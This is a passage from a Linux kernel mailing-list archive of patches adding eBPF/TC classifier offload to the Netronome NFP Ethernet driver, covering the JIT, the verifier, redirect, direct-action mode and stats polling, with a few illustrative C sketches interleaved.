--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
@@ -674,6 +674,16 @@ static int construct_data_ld(struct nfp_prog *nfp_prog, 
u16 offset, u8 size)
return construct_data_ind_ld(nfp_prog, offset, 0, false, size);
 }
 
+static int wrp_set_mark(struct nfp_prog *nfp_prog, u8 src)
+{
+   emit_alu(nfp_prog, NFP_BPF_ABI_MARK,
+reg_none(), ALU_OP_NONE, reg_b(src));
+   emit_alu(nfp_prog, NFP_BPF_ABI_FLAGS,
+NFP_BPF_ABI_FLAGS, ALU_OP_OR, reg_imm(NFP_BPF_ABI_FLAG_MARK));
+
+   return 0;
+}
+
 static void
 wrp_alu_imm(struct nfp_prog *nfp_prog, u8 dst, enum alu_op alu_op, u32 imm)
 {
@@ -1117,6 +1127,14 @@ static int mem_ldx4(struct nfp_prog *nfp_prog, struct 
nfp_insn_meta *meta)
return 0;
 }
 
+static int mem_stx4(struct nfp_prog *nfp_prog, struct nfp_insn_meta *meta)
+{
+   if (meta->insn.off == offsetof(struct sk_buff, mark))
+   return wrp_set_mark(nfp_prog, meta->insn.src_reg * 2);
+
+   return -ENOTSUPP;
+}
+
 static int jump(struct nfp_prog *nfp_prog, struct nfp_insn_meta *meta)
 {
if (meta->insn.off < 0) /* TODO */
@@ -1306,6 +1324,7 @@ static const instr_cb_t instr_cb[256] = {
[BPF_LD | BPF_IND | BPF_H] =data_ind_ld2,
[BPF_LD | BPF_IND | BPF_W] =data_ind_ld4,
[BPF_LDX | BPF_MEM | BPF_W] =   mem_ldx4,
+   [BPF_STX | BPF_MEM | BPF_W] =   mem_stx4,
[BPF_JMP | BPF_JA | BPF_K] =jump,
[BPF_JMP | BPF_JEQ | BPF_K] =   jeq_imm,
[BPF_JMP | BPF_JGT | BPF_K] =   jgt_imm,
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net.h 
b/drivers/net/ethernet/netronome/nfp/nfp_net.h
index 13c6a9001b4d..ed824e11a1e3 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net.h
@@ -269,6 +269,8 @@ struct nfp_net_rx_desc {
};
 };
 
+#define NFP_NET_META_FIELD_MASK GENMASK(NFP_NET_META_FIELD_SIZE - 1, 0)
+
 struct nfp_net_rx_hash {
__be32 hash_type;
__be32 hash;
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c 
b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
index f091eb758ca2..415691edcaa5 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
@@ -1293,38 +1293,72 @@ static void nfp_net_rx_csum(struct nfp_net *nn, struct 
nfp_net_r_vector *r_vec,
}
 }
 
-/**
- * nfp_net_set_hash() - Set SKB hash data
- * @netdev: adapter's net_device structure
- * @skb:   SKB to set the hash data on
- * @rxd:   RX descriptor
- *
- * The RSS hash and hash-type are pre-pended to the packet data.
- * Extract and decode it and set the skb fields.
- */
 static void nfp_net_set_hash(struct net_device *netdev, struct sk_buff *skb,
-struct nfp_net_rx_desc *rxd)
+unsigned int type, __be32 *hash)
 {
-   struct nfp_net_rx_hash *rx_hash;
-
-   if (!(rxd->rxd.flags & PCIE_DESC_RX_RSS) ||
-   !(netdev->features & NETIF_F_RXHASH))
+   if (!(netdev->features & NETIF_F_RXHASH))
return;
 
-   rx_hash = (struct nfp_net_rx_hash *)(skb->data - sizeof(*rx_hash));
-
-   switch (be32_to_cpu(rx_hash->hash_type)) {
+   switch (type) {
case NFP_NET_RSS_IPV4:
case NFP_NET_RSS_IPV6:
case NFP_NET_RSS_IPV6_EX:
-   skb_set_hash(skb, be32_to_cpu(rx_hash->hash), PKT_HASH_TYPE_L3);
+   skb_set_hash(skb, get_unaligned_be32(hash), PKT_HASH_TYPE_L3);
break;

[PATCHv6 net-next 10/15] net: cls_bpf: allow offloaded filters to update stats

2016-09-18 Thread Jakub Kicinski

Call into offloaded filters to update stats.

Signed-off-by: Jakub Kicinski 
Acked-by: Daniel Borkmann 
---
 include/net/pkt_cls.h |  1 +
 net/sched/cls_bpf.c   | 11 +++
 2 files changed, 12 insertions(+)

diff --git a/include/net/pkt_cls.h b/include/net/pkt_cls.h
index 57af9f3032ff..5ccaa4be7d96 100644
--- a/include/net/pkt_cls.h
+++ b/include/net/pkt_cls.h
@@ -490,6 +490,7 @@ enum tc_clsbpf_command {
TC_CLSBPF_ADD,
TC_CLSBPF_REPLACE,
TC_CLSBPF_DESTROY,
+   TC_CLSBPF_STATS,
 };
 
 struct tc_cls_bpf_offload {
diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 18f9869cd4da..9b29e0673346 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -220,6 +220,15 @@ static void cls_bpf_stop_offload(struct tcf_proto *tp,
prog->offloaded = false;
 }
 
+static void cls_bpf_offload_update_stats(struct tcf_proto *tp,
+struct cls_bpf_prog *prog)
+{
+   if (!prog->offloaded)
+   return;
+
+   cls_bpf_offload_cmd(tp, prog, TC_CLSBPF_STATS);
+}
+
 static int cls_bpf_init(struct tcf_proto *tp)
 {
struct cls_bpf_head *head;
@@ -575,6 +584,8 @@ static int cls_bpf_dump(struct net *net, struct tcf_proto 
*tp, unsigned long fh,
 
tm->tcm_handle = prog->handle;
 
+   cls_bpf_offload_update_stats(tp, prog);
+
nest = nla_nest_start(skb, TCA_OPTIONS);
if (nest == NULL)
goto nla_put_failure;
-- 
1.9.1

[PATCHv6 net-next 15/15] nfp: bpf: add offload of TC direct action mode

2016-09-18 Thread Jakub Kicinski

Add offload of TC in direct action mode.  We just need
to provide appropriate checks in the verifier and
a new outro block to translate the exit codes to what
the data path expects.
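
The exit code translation listed in the nfp_outro_tc_da() comment below
can be modelled as a nibble lookup.  This is a sketch under assumptions:
the ex_* names are hypothetical, and the way the two immediates are
combined is inferred from the table in that comment (0x41221211
supplying the low nibble, 0x41001211 the high nibble), since the rest
of the function is not visible in this excerpt.

```c
#include <stdint.h>

/* Immediates taken from the patch; their roles are an assumption. */
#define EX_DA_LOW_NIBBLES   0x41221211u
#define EX_DA_HIGH_NIBBLES  0x41001211u

/* Map a TC direct-action return value to the data path code. */
static uint8_t ex_da_exit_code(uint32_t r0)
{
	unsigned int shift;

	/* Values above 7 are treated as aborts: pass, count as stat0. */
	if (r0 > 7)
		return 0x11;

	shift = r0 * 4; /* select the nibble indexed by r0 */

	return (uint8_t)((((EX_DA_HIGH_NIBBLES >> shift) & 0xf) << 4) |
			 ((EX_DA_LOW_NIBBLES >> shift) & 0xf));
}
```

With these tables, return values 2, 4, 5 and 7 map to 0x22, 0x02, 0x02
and 0x44 respectively, and every other value falls back to 0x11, which
matches the table in the comment.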

Signed-off-by: Jakub Kicinski 
---
 drivers/net/ethernet/netronome/nfp/nfp_bpf.h   |  1 +
 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c   | 66 ++
 .../net/ethernet/netronome/nfp/nfp_bpf_verifier.c  | 11 +++-
 .../net/ethernet/netronome/nfp/nfp_net_offload.c   |  6 +-
 4 files changed, 82 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
index adbe0235d98e..fc220cd04115 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
@@ -61,6 +61,7 @@ enum static_regs {
 enum nfp_bpf_action_type {
NN_ACT_TC_DROP,
NN_ACT_TC_REDIR,
+   NN_ACT_DIRECT,
 };
 
 /* Software register representation, hardware encoding in asm.h */
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
index 434bef975c58..3de819acd68c 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
@@ -321,6 +321,16 @@ __emit_br(struct nfp_prog *nfp_prog, enum br_mask mask, 
enum br_ev_pip ev_pip,
nfp_prog_push(nfp_prog, insn);
 }
 
+static void emit_br_def(struct nfp_prog *nfp_prog, u16 addr, u8 defer)
+{
+   if (defer > 2) {
+   pr_err("BUG: branch defer out of bounds %d\n", defer);
+   nfp_prog->error = -EFAULT;
+   return;
+   }
+   __emit_br(nfp_prog, BR_UNC, BR_EV_PIP_UNCOND, BR_CSS_NONE, addr, defer);
+}
+
 static void
 emit_br(struct nfp_prog *nfp_prog, enum br_mask mask, u16 addr, u8 defer)
 {
@@ -1465,9 +1475,65 @@ static void nfp_outro_tc_legacy(struct nfp_prog 
*nfp_prog)
  SHF_SC_L_SHF, 16);
 }
 
+static void nfp_outro_tc_da(struct nfp_prog *nfp_prog)
+{
+   /* TC direct-action mode:
+*   0,1   ok  NOT SUPPORTED[1]
+*   2   drop  0x22 -> drop,  count as stat1
+*   4,5 nuke  0x02 -> drop
+*   7  redir  0x44 -> redir, count as stat2
+*   * unspec  0x11 -> pass,  count as stat0
+*
+* [1] We can't support OK and RECLASSIFY because we can't tell TC
+* the exact decision made.  We are forced to support UNSPEC
+* to handle aborts so that's the only one we handle for passing
+* packets up the stack.
+*/
+   /* Target for aborts */
+   nfp_prog->tgt_abort = nfp_prog_current_offset(nfp_prog);
+
+   emit_br_def(nfp_prog, nfp_prog->tgt_done, 2);
+
+   emit_alu(nfp_prog, reg_a(0),
+reg_none(), ALU_OP_NONE, NFP_BPF_ABI_FLAGS);
+   emit_ld_field(nfp_prog, reg_a(0), 0xc, reg_imm(0x11), SHF_SC_L_SHF, 16);
+
+   /* Target for normal exits */
+   nfp_prog->tgt_out = nfp_prog_current_offset(nfp_prog);
+
+   /* if R0 > 7 jump to abort */
+   emit_alu(nfp_prog, reg_none(), reg_imm(7), ALU_OP_SUB, reg_b(0));
+   emit_br(nfp_prog, BR_BLO, nfp_prog->tgt_abort, 0);
+   emit_alu(nfp_prog, reg_a(0),
+reg_none(), ALU_OP_NONE, NFP_BPF_ABI_FLAGS);
+
+   wrp_immed(nfp_prog, reg_b(2), 0x41221211);
+   wrp_immed(nfp_prog, reg_b(3), 0x41001211);
+
+   emit_shf(nfp_prog, reg_a(1),
+reg_none(), SHF_OP_NONE, reg_b(0), SHF_SC_L_SHF, 2);
+
+   emit_alu(nfp_prog, reg_none(), reg_a(1), ALU_OP_OR, reg_imm(0));
+   emit_shf(nfp_prog, reg_a(2),
+reg_imm(0xf), SHF_OP_AND, reg_b(2), SHF_SC_R_SHF, 0);
+
+   emit_alu(nfp_prog, reg_none(), reg_a(1), ALU_OP_OR, reg_imm(0));
+   emit_shf(nfp_prog, reg_b(2),
+reg_imm(0xf), SHF_OP_AND, reg_b(3), SHF_SC_R_SHF, 0);
+
+   emit_br_def(nfp_prog, nfp_prog->tgt_done, 2);
+
+   emit_shf(nfp_prog, reg_b(2),
+reg_a(2), SHF_OP_OR, reg_b(2), SHF_SC_L_SHF, 4);
+   emit_ld_field(nfp_prog, reg_a(0), 0xc, reg_b(2), SHF_SC_L_SHF, 16);
+}
+
 static void nfp_outro(struct nfp_prog *nfp_prog)
 {
switch (nfp_prog->act) {
+   case NN_ACT_DIRECT:
+   nfp_outro_tc_da(nfp_prog);
+   break;
case NN_ACT_TC_DROP:
case NN_ACT_TC_REDIR:
nfp_outro_tc_legacy(nfp_prog);
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c
index ef6775b54168..144cae87f63a 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c
@@ -86,7 +86,16 @@ nfp_bpf_check_exit(struct nfp_prog *nfp_prog,
return -EINVAL;
}
 
-   if (reg0->imm != 0 && (reg0->imm & ~0U) != ~0U) {
+   if (nfp_prog->act != NN_ACT_DIRECT &&
+   reg0->imm != 0 && (reg0->imm & ~0U) != ~0U) {
+   pr_info("unsupported exit state: %d, imm: %l

[PATCHv6 net-next 14/15] nfp: bpf: add support for legacy redirect action

2016-09-18 Thread Jakub Kicinski

The data path has redirect support, so expressing a redirect
to the port the frame came from is a trivial matter of
setting the right result code.

Signed-off-by: Jakub Kicinski 
---
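Note (illustration only, not part of the patch): a standalone sketch of
the action selection this patch extends.  The struct and all *_sketch
names are hypothetical stand-ins for the TC action list and the driver
enum; only the 0x22 and 0x24 result codes are taken from the diff.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

enum act_sketch {
	ACT_SKETCH_DROP,
	ACT_SKETCH_REDIR,
	ACT_SKETCH_UNSUPPORTED,
};

/* Hypothetical, flattened description of one TC action. */
struct action_sketch {
	bool is_drop;
	bool is_redirect;
	int  target_ifindex; /* only meaningful for redirects */
};

/* Result codes copied from the act2code[] table in the patch. */
static const uint8_t act2code_sketch[] = {
	[ACT_SKETCH_DROP]  = 0x22,
	[ACT_SKETCH_REDIR] = 0x24,
};

/* A redirect is only accepted when it points back at the device the
 * frame arrived on; anything else is reported as unsupported.
 */
static enum act_sketch classify_action(const struct action_sketch *a,
				       int own_ifindex)
{
	if (a->is_drop)
		return ACT_SKETCH_DROP;
	if (a->is_redirect && a->target_ifindex == own_ifindex)
		return ACT_SKETCH_REDIR;
	return ACT_SKETCH_UNSUPPORTED;
}
```
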
 drivers/net/ethernet/netronome/nfp/nfp_bpf.h | 1 +
 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c | 2 ++
 drivers/net/ethernet/netronome/nfp/nfp_net_offload.c | 4 
 3 files changed, 7 insertions(+)

diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
index 2adb1d80c7b7..adbe0235d98e 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
@@ -60,6 +60,7 @@ enum static_regs {
 
 enum nfp_bpf_action_type {
NN_ACT_TC_DROP,
+   NN_ACT_TC_REDIR,
 };
 
 /* Software register representation, hardware encoding in asm.h */
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
index 368381f0357f..434bef975c58 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
@@ -1440,6 +1440,7 @@ static void nfp_outro_tc_legacy(struct nfp_prog *nfp_prog)
 {
const u8 act2code[] = {
[NN_ACT_TC_DROP]  = 0x22,
+   [NN_ACT_TC_REDIR] = 0x24
};
/* Target for aborts */
nfp_prog->tgt_abort = nfp_prog_current_offset(nfp_prog);
@@ -1468,6 +1469,7 @@ static void nfp_outro(struct nfp_prog *nfp_prog)
 {
switch (nfp_prog->act) {
case NN_ACT_TC_DROP:
+   case NN_ACT_TC_REDIR:
nfp_outro_tc_legacy(nfp_prog);
break;
}
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_offload.c 
b/drivers/net/ethernet/netronome/nfp/nfp_net_offload.c
index 0537a53e2174..1ec8e5b74651 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net_offload.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net_offload.c
@@ -123,6 +123,10 @@ nfp_net_bpf_get_act(struct nfp_net *nn, struct 
tc_cls_bpf_offload *cls_bpf)
list_for_each_entry(a, &actions, list) {
if (is_tcf_gact_shot(a))
return NN_ACT_TC_DROP;
+
+   if (is_tcf_mirred_redirect(a) &&
+   tcf_mirred_ifindex(a) == nn->netdev->ifindex)
+   return NN_ACT_TC_REDIR;
}
 
return -ENOTSUPP;
-- 
1.9.1

[PATCHv6 net-next 07/15] bpf: recognize 64bit immediate loads as consts

2016-09-18 Thread Jakub Kicinski

When running as a parser, interpret BPF_LD | BPF_IMM | BPF_DW
instructions as loading CONST_IMM with the value stored
in imm.  The verifier will continue not recognizing those
due to concerns about search space/program complexity
increase.

Signed-off-by: Jakub Kicinski 
Acked-by: Alexei Starovoitov 
Acked-by: Daniel Borkmann 
---
v3:
 - limit to parsers.
---
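Note (illustration only, not part of the patch): a userspace sketch of
how the 64-bit constant is assembled from the two instruction slots of a
BPF_LD | BPF_IMM | BPF_DW load.  struct insn_sketch is a hypothetical,
reduced stand-in for struct bpf_insn that keeps only the imm field.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical, reduced stand-in for struct bpf_insn. */
struct insn_sketch {
	int32_t imm;
};

/* Combine the imm fields of the two slots: insn[0] carries the low
 * 32 bits and insn[1] the high 32 bits of the constant.
 */
static uint64_t ld_imm64_value(const struct insn_sketch *insn)
{
	uint64_t hi = (uint64_t)(uint32_t)insn[1].imm << 32;
	uint64_t lo = (uint32_t)insn[0].imm; /* cast avoids sign extension */

	return hi | lo;
}
```

The cast of the low half through an unsigned 32-bit type matters: without
it a negative imm would be sign-extended and overwrite the high half.
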
 kernel/bpf/verifier.c | 14 --
 1 file changed, 12 insertions(+), 2 deletions(-)

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index ff03cd07f761..1612f7364c42 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -1760,9 +1760,19 @@ static int check_ld_imm(struct bpf_verifier_env *env, 
struct bpf_insn *insn)
if (err)
return err;
 
-   if (insn->src_reg == 0)
-   /* generic move 64-bit immediate into a register */
+   if (insn->src_reg == 0) {
+   /* generic move 64-bit immediate into a register,
+* only analyzer needs to collect the ld_imm value.
+*/
+   u64 imm = ((u64)(insn + 1)->imm << 32) | (u32)insn->imm;
+
+   if (!env->analyzer_ops)
+   return 0;
+
+   regs[insn->dst_reg].type = CONST_IMM;
+   regs[insn->dst_reg].imm = imm;
return 0;
+   }
 
/* replace_map_fd_with_map_ptr() should have caught bad ld_imm64 */
BUG_ON(insn->src_reg != BPF_PSEUDO_MAP_FD);
-- 
1.9.1

[PATCHv6 net-next 08/15] nfp: add BPF to NFP code translator

2016-09-18 Thread Jakub Kicinski

Add translator for JITing eBPF to operations which
can be executed on NFP's programmable engines.

Signed-off-by: Jakub Kicinski 
---
v6:
 - explicitly check for registers >= MAX_BPF_REG;
 - fix mem leak.
v4:
 - use bitfield.h directly.
v3:
 - don't clone the program for the verifier (no longer needed);
 - temporarily add a local copy of macros from bitfield.h.

NOTE: this one will probably trigger buildbot failures because
  it depends on pull request from wireless-drivers-next.
---
 drivers/net/ethernet/netronome/nfp/Makefile|6 +
 drivers/net/ethernet/netronome/nfp/nfp_asm.h   |  233 +++
 drivers/net/ethernet/netronome/nfp/nfp_bpf.h   |  208 +++
 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c   | 1724 
 .../net/ethernet/netronome/nfp/nfp_bpf_verifier.c  |  162 ++
 5 files changed, 2333 insertions(+)
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_asm.h
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf.h
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c

diff --git a/drivers/net/ethernet/netronome/nfp/Makefile 
b/drivers/net/ethernet/netronome/nfp/Makefile
index 68178819ff12..5f12689bf523 100644
--- a/drivers/net/ethernet/netronome/nfp/Makefile
+++ b/drivers/net/ethernet/netronome/nfp/Makefile
@@ -5,4 +5,10 @@ nfp_netvf-objs := \
nfp_net_ethtool.o \
nfp_netvf_main.o
 
+ifeq ($(CONFIG_BPF_SYSCALL),y)
+nfp_netvf-objs += \
+   nfp_bpf_verifier.o \
+   nfp_bpf_jit.o
+endif
+
 nfp_netvf-$(CONFIG_NFP_NET_DEBUG) += nfp_net_debugfs.o
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_asm.h 
b/drivers/net/ethernet/netronome/nfp/nfp_asm.h
new file mode 100644
index 000000000000..22484b6fd3e8
--- /dev/null
+++ b/drivers/net/ethernet/netronome/nfp/nfp_asm.h
@@ -0,0 +1,233 @@
+/*
+ * Copyright (C) 2016 Netronome Systems, Inc.
+ *
+ * This software is dual licensed under the GNU General License Version 2,
+ * June 1991 as shown in the file COPYING in the top-level directory of this
+ * source tree or the BSD 2-Clause License provided below.  You have the
+ * option to license this software under the complete terms of either license.
+ *
+ * The BSD 2-Clause License:
+ *
+ * Redistribution and use in source and binary forms, with or
+ * without modification, are permitted provided that the following
+ * conditions are met:
+ *
+ *  1. Redistributions of source code must retain the above
+ * copyright notice, this list of conditions and the following
+ * disclaimer.
+ *
+ *  2. Redistributions in binary form must reproduce the above
+ * copyright notice, this list of conditions and the following
+ * disclaimer in the documentation and/or other materials
+ * provided with the distribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+ * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+ * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+ * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
+ * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
+ * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
+ * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+#ifndef __NFP_ASM_H__
+#define __NFP_ASM_H__ 1
+
+#include "nfp_bpf.h"
+
+#define REG_NONE   0
+
+#define RE_REG_NO_DST  0x020
+#define RE_REG_IMM 0x020
+#define RE_REG_IMM_encode(x)   \
+   (RE_REG_IMM | ((x) & 0x1f) | (((x) & 0x60) << 1))
+#define RE_REG_IMM_MAX  0x07fULL
+#define RE_REG_XFR 0x080
+
+#define UR_REG_XFR 0x180
+#define UR_REG_NN  0x280
+#define UR_REG_NO_DST  0x300
+#define UR_REG_IMM UR_REG_NO_DST
+#define UR_REG_IMM_encode(x) (UR_REG_IMM | (x))
+#define UR_REG_IMM_MAX  0x0ffULL
+
+#define OP_BR_BASE 0x0d80020ULL
+#define OP_BR_BASE_MASK0x0f8000c3ce0ULL
+#define OP_BR_MASK 0x01fULL
+#define OP_BR_EV_PIP   0x300ULL
+#define OP_BR_CSS  0x003c000ULL
+#define OP_BR_DEFBR0x030ULL
+#define OP_BR_ADDR_LO  0x007ffc0ULL
+#define OP_BR_ADDR_HI  0x100ULL
+
+#define nfp_is_br(_insn)   \
+   (((_insn) & OP_BR_BASE_MASK) == OP_BR_BASE)
+
+enum br_mask {
+   BR_BEQ = 0x00,
+   BR_BNE = 0x01,
+   BR_BHS = 0x04,
+   BR_BLO = 0x05,
+   BR_BGE = 0x08,
+   BR_UNC = 0x18,
+};
+
+enum br_ev_pip {
+   BR_EV_PIP_UNCOND = 0,
+   BR_EV_PIP_COND = 1,
+};
+
+enum br_ctx_signal_state {
+   BR_CSS_NONE = 2,
+};
+
+#define OP_BBYTE_BASE  0x0c8ULL
+#define OP_BB_A_SRC0x0ffULL
+#define OP_BB_BYTE 0x300ULL
+#define OP_BB_B_SRC0x003fc00ULL
+#define OP_BB_I8   0x004ULL
+#define OP_BB_EQ   0x008ULL
+#define OP_BB_DEFBR0x030ULL
+#defin

[PATCHv6 net-next 11/15] nfp: bpf: allow offloaded filters to update stats

2016-09-18 Thread Jakub Kicinski

Periodically poll stats and call into offloaded actions
to update them.

Signed-off-by: Jakub Kicinski 
---
v3:
 - add missing hunk with ethtool stats.
---
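Note (illustration only, not part of the patch): the polling hunk is not
fully visible here, so the following is only a sketch of the
"current vs. previous" bookkeeping suggested by the rx_filter and
rx_filter_prev fields.  The function name is hypothetical, and whether
the driver computes deltas exactly this way is an assumption.

```c
#include <assert.h>
#include <stdint.h>

/* Same shape as struct nfp_stat_pair in the patch. */
struct stat_pair {
	uint64_t pkts;
	uint64_t bytes;
};

/* Return what changed since the previous poll and remember the new
 * totals.  Unsigned subtraction stays correct across counter wrap.
 */
static struct stat_pair stat_pair_delta(struct stat_pair *prev,
					struct stat_pair latest)
{
	struct stat_pair delta = {
		.pkts  = latest.pkts - prev->pkts,
		.bytes = latest.bytes - prev->bytes,
	};

	*prev = latest;
	return delta;
}
```

A periodic timer would call such a helper once per interval and hand the
delta to the offloaded action's stats update hook.
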
 drivers/net/ethernet/netronome/nfp/nfp_net.h   | 19 +++
 .../net/ethernet/netronome/nfp/nfp_net_common.c|  3 ++
 .../net/ethernet/netronome/nfp/nfp_net_ethtool.c   | 12 +
 .../net/ethernet/netronome/nfp/nfp_net_offload.c   | 63 ++
 4 files changed, 97 insertions(+)

diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net.h 
b/drivers/net/ethernet/netronome/nfp/nfp_net.h
index ea6f5e667f27..13c6a9001b4d 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net.h
@@ -62,6 +62,9 @@
 /* Max time to wait for NFP to respond on updates (in seconds) */
 #define NFP_NET_POLL_TIMEOUT   5
 
+/* Interval for reading offloaded filter stats */
+#define NFP_NET_STAT_POLL_IVL  msecs_to_jiffies(100)
+
 /* Bar allocation */
 #define NFP_NET_CTRL_BAR   0
 #define NFP_NET_Q0_BAR 2
@@ -405,6 +408,11 @@ static inline bool nfp_net_fw_ver_eq(struct 
nfp_net_fw_version *fw_ver,
   fw_ver->minor == minor;
 }
 
+struct nfp_stat_pair {
+   u64 pkts;
+   u64 bytes;
+};
+
 /**
  * struct nfp_net - NFP network device structure
  * @pdev:   Backpointer to PCI device
@@ -428,6 +436,11 @@ static inline bool nfp_net_fw_ver_eq(struct 
nfp_net_fw_version *fw_ver,
  * @rss_cfg:RSS configuration
  * @rss_key:RSS secret key
  * @rss_itbl:   RSS indirection table
+ * @rx_filter: Filter offload statistics - dropped packets/bytes
+ * @rx_filter_prev:Filter offload statistics - values from previous update
+ * @rx_filter_change:  Jiffies when statistics last changed
+ * @rx_filter_stats_timer:  Timer for polling filter offload statistics
+ * @rx_filter_lock:Lock protecting timer state changes (teardown)
  * @max_tx_rings:   Maximum number of TX rings supported by the Firmware
  * @max_rx_rings:   Maximum number of RX rings supported by the Firmware
  * @num_tx_rings:   Currently configured number of TX rings
@@ -504,6 +517,11 @@ struct nfp_net {
u8 rss_key[NFP_NET_CFG_RSS_KEY_SZ];
u8 rss_itbl[NFP_NET_CFG_RSS_ITBL_SZ];
 
+   struct nfp_stat_pair rx_filter, rx_filter_prev;
+   unsigned long rx_filter_change;
+   struct timer_list rx_filter_stats_timer;
+   spinlock_t rx_filter_lock;
+
int max_tx_rings;
int max_rx_rings;
 
@@ -775,6 +793,7 @@ static inline void nfp_net_debugfs_adapter_del(struct 
nfp_net *nn)
 }
 #endif /* CONFIG_NFP_NET_DEBUG */
 
+void nfp_net_filter_stats_timer(unsigned long data);
 int
 nfp_net_bpf_offload(struct nfp_net *nn, u32 handle, __be16 proto,
struct tc_cls_bpf_offload *cls_bpf);
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c 
b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
index 51978dfe883b..f091eb758ca2 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
@@ -2703,10 +2703,13 @@ struct nfp_net *nfp_net_netdev_alloc(struct pci_dev 
*pdev,
nn->rxd_cnt = NFP_NET_RX_DESCS_DEFAULT;
 
spin_lock_init(&nn->reconfig_lock);
+   spin_lock_init(&nn->rx_filter_lock);
spin_lock_init(&nn->link_status_lock);
 
setup_timer(&nn->reconfig_timer,
nfp_net_reconfig_timer, (unsigned long)nn);
+   setup_timer(&nn->rx_filter_stats_timer,
+   nfp_net_filter_stats_timer, (unsigned long)nn);
 
return nn;
 }
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c 
b/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
index 4c9897220969..3418f2277e9d 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
@@ -106,6 +106,18 @@ static const struct _nfp_net_et_stats nfp_net_et_stats[] = 
{
{"dev_tx_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_TX_FRAMES)},
{"dev_tx_mc_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_TX_MC_FRAMES)},
{"dev_tx_bc_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_TX_BC_FRAMES)},
+
+   {"bpf_pass_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP0_FRAMES)},
+   {"bpf_pass_bytes", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP0_BYTES)},
+   /* see comments in outro functions in nfp_bpf_jit.c to find out
+* how different BPF modes use app-specific counters
+*/
+   {"bpf_app1_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP1_FRAMES)},
+   {"bpf_app1_bytes", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP1_BYTES)},
+   {"bpf_app2_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP2_FRAMES)},
+   {"bpf_app2_bytes", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP2_BYTES)},
